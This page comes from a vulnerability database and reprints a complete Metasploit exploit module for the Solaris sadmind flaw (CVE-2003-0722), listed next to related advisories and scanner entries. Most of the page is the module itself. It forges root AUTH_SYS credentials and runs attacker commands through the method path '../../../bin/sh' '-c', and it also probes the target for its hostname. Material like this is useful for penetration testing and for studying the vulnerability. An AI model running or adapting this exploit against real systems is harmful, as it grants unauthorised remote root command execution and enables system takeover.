Lucene search
K

Solaris sadmind Command Execution

Solaris sadmind default security weakness targeted for command execution on Solaris 2.7, 8, and

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2003-0722
22 Jun 201000:00
circl
CVE
CVE-2003-0722
17 Sep 200304:00
cve
Cvelist
CVE-2003-0722
17 Sep 200304:00
cvelist
Exploit DB
Solaris Sadmind - Command Execution (Metasploit)
22 Jun 201000:00
exploitdb
NVD
CVE-2003-0722
22 Sep 200304:00
nvd
Packet Storm
Solaris sadmind Command Execution
28 Oct 200900:00
packetstorm
Tenable Nessus
Solaris sadmind AUTH_SYS Credential Remote Command Execution
19 Sep 200300:00
nessus
canvas
Immunity Canvas: SADMIND
22 Sep 200304:00
canvas
Saint
sadmind AUTH_SYS authentication vulnerability
9 Jan 200600:00
saint
Saint
sadmind AUTH_SYS authentication vulnerability
9 Jan 200600:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris sadmind Command Execution',
      'Description'    => %q{
          This exploit targets a weakness in the default security
        settings of the sadmind RPC application. This server is
        installed and enabled by default on most versions of the
        Solaris operating system.

        Vulnerable systems include solaris 2.7, 8, and 9
      },
      'Author'         => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2003-0722'],
          ['OSVDB', '4585'],
          ['BID', '8615']
        ],
      'Privileged'     => true,
      'Platform'       => %w{ solaris unix },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => "\x00",
          'DisableNops' => true,
          'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DisclosureDate' => '2003-09-13',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
        OptInt.new('GID', [false, 'GID to emulate', 0]),
        OptInt.new('UID', [false, 'UID to emulate', 0])
      ], self.class
    )
  end

  def exploit
    sunrpc_create('udp', 100232, 10)
    sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])

    if !datastore['HOSTNAME']
      print_status('attempting to determine hostname')
      response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")

      if !response
        print_error('no response')
        return
      end

      match = /Security exception on host (.*)\.  USER/.match(response)
      if match
        hostname = match.captures[0]
        print_status("found hostname: #{hostname}")
      else
        print_error('unable to determine hostname')
        return
      end
    else
      hostname = datastore['HOSTNAME']
    end

    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
    response = sadmind_request(hostname, payload.encoded)
    sunrpc_destroy

    if /Security exception on host/.match(response)
      print_error('exploit failed')
      return
    else
      print_status('exploit did not give us an error, this is good...')
      select(nil,nil,nil,1)
      handler
    end
  end

  def sadmind_request(host, command)
    header =
      Rex::Encoder::XDR.encode(0) * 7 +
      Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
        4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
        host, 'system', '../../../bin/sh')

    body =
      do_int('ADM_FW_VERSION', 1) +
      do_string('ADM_LANG', 'C') +
      do_string('ADM_REQUESTID', '00009:000000000:0') +
      do_string('ADM_CLASS', 'system') +
      do_string('ADM_CLASS_VERS', '2.1') +
      do_string('ADM_METHOD', '../../../bin/sh') +
      do_string('ADM_HOST', host) +
      do_string('ADM_CLIENT_HOST', host) +
      do_string('ADM_CLIENT_DOMAIN', '') +
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
      do_int('ADM_FENCE', 0) +
      do_string('X', '-c') +
      do_string('Y', command) +
      Rex::Encoder::XDR.encode('netmgt_endofargs')

    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body

    ret = sunrpc_call(1, request)
    return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
  end

  def do_string(str1, str2)
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
  end

  def do_int(str, int)
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation